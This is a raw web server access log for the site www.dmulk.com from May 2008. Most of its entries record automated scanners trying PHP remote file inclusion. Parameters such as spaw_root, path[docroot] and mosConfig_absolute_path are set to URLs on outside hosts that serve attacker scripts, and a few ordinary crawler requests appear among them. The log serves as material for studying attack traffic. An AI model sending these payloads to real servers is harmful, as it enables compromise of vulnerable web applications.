122.220.195.21 - - [16/May/2008:10:34:20 -0700] "GET /logs/access_080103.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.186 - - [16/May/2008:10:34:28 -0700] "GET /logs/access_080215.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:34:28 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:34:29 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [16/May/2008:10:34:42 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:34:44 -0700] "GET /logs/access_080117.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:34:44 -0700] "GET /logs/access_080218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:34:45 -0700] "GET /logs/config.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:34:45 -0700] "GET /config.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:35:00 -0700] "GET /logs/access_071229.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:35:01 -0700] "GET /logs/access_071221.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:35:06 -0700] "GET /logs/access_071228.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:35:20 -0700] "GET /logs/access_071129.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:35:20 -0700] "GET /logs/access_080313.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:35:25 -0700] "GET /logs/access_071215.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:35:26 -0700] "GET /logs/access_080221.log//faqsupport/samplefaqsupport.php?path[docroot]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:35:27 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:35:27 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:35:34 -0700] "GET /logs/access_080110.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:35:36 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:35:36 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:35:40 -0700] "GET /logs/access_071218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:35:40 -0700] "GET /logs/access_080130.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.210.113.58 - - [16/May/2008:10:35:50 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.210.113.58 - - [16/May/2008:10:35:51 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:35:51 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:35:53 -0700] "GET /logs/access_071211.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:35:55 -0700] "GET /logs/access_080127.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:35:56 -0700] "GET /logs/access_080108.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:35:56 -0700] "GET /logs/access_080209.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:10:36:01 -0700] "GET /retreat1/webcam/retreat1_00750.jpg HTTP/1.1" 200 49636 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:36:03 -0700] "GET /logs/access_071224.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:36:04 -0700] "GET /logs/access_080103.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:36:29 -0700] "GET /logs/access_080117.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:36:30 -0700] "GET /logs/access_080225.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:36:30 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:36:31 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:10:36:34 -0700] "GET /logs/access_080327.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:36:34 -0700] "GET /logs/access_080218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:10:36:34 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:10:36:35 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:36:37 -0700] "GET /logs/access_080124.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:10:36:38 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:36:39 -0700] "GET /logs/access_080123.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.188.13 - - [16/May/2008:10:36:44 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [16/May/2008:10:36:44 -0700] "GET /logs//?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 200 47704 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:36:45 -0700] "GET /logs/access_071221.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:36:47 -0700] "GET /logs/access_080105.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:36:47 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [16/May/2008:10:36:50 -0700] "GET //?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.84.31 - - [16/May/2008:10:36:50 -0700] "GET /logs/errors.php?error=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.84.31 - - [16/May/2008:10:36:50 -0700] "GET /errors.php?error=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:36:51 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:36:51 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:10:36:53 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:10:36:53 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:10:36:54 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:37:00 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:37:01 -0700] "GET /logs/access_071228.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:37:04 -0700] "GET /logs/access_080214.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:37:04 -0700] "GET /logs/access_071226.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:37:09 -0700] "GET /logs/access_071129.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:37:15 -0700] "GET /logs/access_080308.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:37:16 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:37:16 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:37:26 -0700] "GET /myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:37:31 -0700] "GET /logs/access_071215.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:37:32 -0700] "GET /logs/access_080119.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:37:32 -0700] "GET /logs/access_080106.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:37:39 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:37:39 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:37:43 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:10:37:48 -0700] "GET /logs/access_080327.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.21.56 - - [16/May/2008:10:37:48 -0700] "GET /?S=A HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:37:55 -0700] "GET /logs/access_071218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:37:55 -0700] "GET /logs/access_080130.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.127.84.31 - - [16/May/2008:10:37:59 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.84.31 - - [16/May/2008:10:37:59 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.19.188.13 - - [16/May/2008:10:38:06 -0700] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:38:06 -0700] "GET /logs/access_071211.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:38:06 -0700] "GET /logs/access_080127.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:38:08 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:38:08 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:38:13 -0700] "GET /logs/access_080209.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:38:29 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:38:29 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:38:31 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:38:31 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
82.77.9.141 - - [16/May/2008:10:38:36 -0700] "GET /logs/index2.php?page=http://juartea.biz/image/main/.news/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
82.77.9.141 - - [16/May/2008:10:38:37 -0700] "GET /index2.php?page=http://juartea.biz/image/main/.news/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
82.77.9.141 - - [16/May/2008:10:38:37 -0700] "GET /logs/index2.php?page=http://www.freewebtown.com/muiema/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
82.77.9.141 - - [16/May/2008:10:38:37 -0700] "GET /index2.php?page=http://www.freewebtown.com/muiema/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:38:43 -0700] "GET /logs/access_080313.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:38:45 -0700] "GET /logs/access_080124.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:38:48 -0700] "GET /logs/access_080123.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.26.26 - - [16/May/2008:10:38:49 -0700] "GET /logs/access_080412.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:38:50 -0700] "GET /logs/access_080105.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:38:56 -0700] "GET /logs/access_071226.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:39:15 -0700] "GET /logs/access_080119.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:39:15 -0700] "GET /logs/access_080106.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:39:16 -0700] "GET /logs/access_080225.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:39:16 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
